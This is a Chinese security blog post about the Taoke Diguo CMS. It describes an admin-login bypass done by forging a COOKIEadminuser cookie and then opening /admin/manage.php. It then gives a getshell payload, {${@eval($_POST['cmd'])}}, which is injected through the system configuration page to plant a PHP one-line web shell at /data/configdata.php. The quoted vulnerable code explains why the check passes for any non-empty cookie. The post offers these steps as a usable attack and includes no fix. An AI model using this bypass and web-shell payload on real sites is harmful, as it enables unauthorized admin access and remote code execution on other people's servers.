淘客帝国cms系统后台cookie欺骗漏洞及后台拿shell

没穿底裤 2019年12月31日23:40:40评论614 views字数 1093阅读3分38秒阅读模式
摘要

偶然发现的淘客帝国免费版的后台可以cookie欺骗工具: 老兵的cookie’欺骗工具
关键字: 分类- 商城- 品牌- 女人- 男人- 美容- 鞋包- 数码- 居家- 食品

偶然发现的淘客帝国免费版的后台可以cookie欺骗

工具: 老兵的cookie’欺骗工具
关键字: 分类- 商城- 品牌- 女人- 男人- 美容- 鞋包- 数码- 居家- 食品

首先打开工具把cookie改为 COOKIEadminuser=admin; DedeUserID=1; PHPSESSID=11111 ,然后再工具的地址栏那里输入网站的后台(默认后台/admin)等页面全部出来后再在后台目录后加上manage.php 跳转就可以进入后台了,进入后台后怎么样拿shell就简单了,这里就不说了..

补下代码【anfli 补】
getshell 简单 系统配置 {${@eval($_POST['cmd'])}} 一句话连接地址/data/configdata.php
顺便补一下代码===================|The End}

##admin目录下php 部验证##
——————–main.php
<?php require_once ‘../include/adminfunction.php’; checkadmin(); ———————/include/sysfunction.php #####   function checkadmin(){ global $COOKIEadminuser; global $sitetitleurl; //判断 if( (isset($_COOKIE['COOKIEadminuser']) && $_COOKIE['COOKIEadminuser']!=”") || (isset($_SESSION['adminuser']) && $_SESSION['adminuser']!=”") ){ } else { echo(“<script language=’JavaScript’>;top.location.href=’”.$sitetitleurl.”‘;</script&gt;”); exit; }

 

一看就懂
$_COOKIE['COOKIEadminuser']!=”" 只要不为空就ok
//index.php 一看到这里就知道 程序员自己催眠了自己 登出就把adminuser 清空 ………COOKIEadminuser是干神马的?/admin/index.php 是不会通过验证 但是如果访问/admin/manage.php 的话一样ok 也就lz所谓的偶然发现了 COOKIEadminuser 并没有空

if($action==”loginout”){ $_SESSION['adminuser'] = “”; SetCookie(“adminuser”, “”); redirect_to($sitetitleurl);

 

其实所有审计过程 是倒序

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2019年12月31日23:40:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   淘客帝国cms系统后台cookie欺骗漏洞及后台拿shellhttp://cn-sec.com/archives/75138.html

发表评论

匿名网友 填写信息